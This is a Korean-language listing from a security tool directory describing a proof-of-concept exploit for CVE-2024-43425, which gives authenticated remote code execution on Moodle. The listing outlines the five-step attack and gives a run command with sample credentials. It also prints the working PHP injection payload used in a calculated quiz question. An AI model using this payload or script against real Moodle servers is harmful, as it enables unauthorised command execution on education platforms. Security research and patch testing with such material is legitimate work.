Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-43425-Poc — CVE-2024-43425에 대한 개념 증명 익스플로잇으로, 악성 계산형 문제 업로드를 통해 Moodle에서 인증된 원격 코드 실행을 시연합니다. | Kitploit
도구/GitHubGitHub/aninfosec/cve-2024-43425-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubaninfosec/cve-2024-43425-poc

CVE-2024-43425-Poc

CVE-2024-43425에 대한 개념 증명 익스플로잇으로, 악성 계산형 문제 업로드를 통해 Moodle에서 인증된 원격 코드 실행을 시연합니다.

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-43425-Poc

CVE 개요
CVE ID: CVE-2024-43425

설명: Moodle은 인증된 교사 수준 사용자가 퀴즈 편집기 인터페이스를 통해 악성 계산 질문을 업로드할 수 있도록 허용합니다.
영향: 원격 코드 실행 (RCE)
원인: 계산 질문 내 수학적 페이로드의 부적절한 검증으로 인해 데이터세트 마법사를 통한 명령 주입이 발생합니다.

##요구 사항:

  • 유효한 로그인 자격 증명
  • 퀴즈 편집 인터페이스에 접근 권한 (일반적으로 교사 또는 관리자 역할)
  • 알려진 cmid (퀴즈 모듈 ID) 및 courseid

##이 스크립트는 5단계 공격을 수행합니다:

단계설명
1️로그인 토큰(logintoken) 가져오기
2️로그인하고 유효한 MoodleSession 설정
3️퀴즈 편집 페이지에서 sesskey, ctxid, category 추출
4️RCE 페이로드가 포함된 특수 제작된 계산 질문 업로드
5️데이터세트 마법사 페이지를 통해 페이로드 트리거

##사용 방법

요구 사항:
Python 3
Python 라이브러리: requests, bs4 (BeautifulSoup)

root@kitploit:~
pip3 install requests bs4
root@kitploit:~
python3 exploit_cve_2024_43425.py \
  --url http://192.168.2.12/moodle \
  --username test \
  --password 'Test@123' \
  --courseid 1 \
  --cmid 1 \
  --cmd 'whoami'

##사용된 페이로드:

root@kitploit:~
answer[0] = "(1)->{system($_GET[chr(97)])}"
도구 다운로드